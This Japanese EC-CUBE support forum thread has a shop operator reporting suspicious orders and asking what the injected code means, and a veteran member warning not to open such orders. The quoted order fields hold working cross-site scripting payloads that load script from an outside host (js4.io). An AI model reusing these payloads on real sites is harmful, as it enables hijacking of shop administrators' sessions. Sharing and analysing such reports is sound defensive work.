どうか教えて下さい!
| 質問 > その他 > 不審な受注について |
その他
 |
| スレッド表示 | 古いものから | 前のトピック | 次のトピック | 下へ |
| 投稿者 | スレッド |
|---|---|
| nanasess |
投稿日時: 2021/6/4 16:52
対応状況: −−−
|
神   登録日: 2006/9/9 居住地: 投稿: 2313 |
Re: 不審な受注について 現時点で EC-CUBE3系に影響があることは確認されていませんが、独自カスタマイズやプラグインなどにより、影響を受ける場合があります。
過信は禁物ですので、くれぐれも開かないようお願い致します。 |
| hibiki1632 |
投稿日時: 2021/6/4 16:00
対応状況: −−−
|
新米   登録日: 2021/6/4 居住地: 投稿: 3 |
Re: 不審な受注について 情報ありがとうございます。
リンク先には「今回の脆弱性に関しましては、EC-CUBE4系をお使いの方対象でございます。」との記述がありましたが、EC-CUBE3系においても影響があるのでしょうか? アドバイス通り、今後不審な受注が来た場合はなるべく開かないようにいたします。 |
| nanasess |
投稿日時: 2021/6/4 15:47
対応状況: −−−
|
神 登録日: 2006/9/9 居住地: 投稿: 2313 |
Re: 不審な受注について
|
| hibiki1632 |
投稿日時: 2021/6/4 15:38
対応状況: −−−
|
新米 登録日: 2021/6/4 居住地: 投稿: 3 |
不審な受注について こんにちは。EC-CUBE3を用いてショップサイトを運営しております。
最近、不審な受注が入るようになりました。 住所欄や会社名欄に "><sCRiPt sRC=//js4.io></sCrIpT> という記述があります。 また、お問い合わせ欄には プライバシーパッケージ</tExtArEa>'"><img src onerror=s=createElement('script');body.appendChild(s);s.src='//js4.io' style='display:none'> という記述がされています。 現状、これといった被害は確認しておりませんが、不気味なので情報を求めています。 同様の現象をご存じの方、もしくは、記述されているのがどういった意味のコードなのかご存じの方がいらっしゃいましたら、ご教授いただければ幸いです。 ▼テンプレート [EC-CUBE] 3.0.16 [レンタルサーバ] Xserver [OS] Linux sv822.xserver.jp 4.4.0-197-generic #229-Ubuntu SMP Wed Nov 25 11:05:42 UTC 2020 x86_64 [PHP] PHP7.2.34 [データベース] MySQL 5.7.27 [WEBサーバ] Apache [ブラウザ] Google Chrome |
| スレッド表示 | 古いものから | 前のトピック | 次のトピック | トップ |
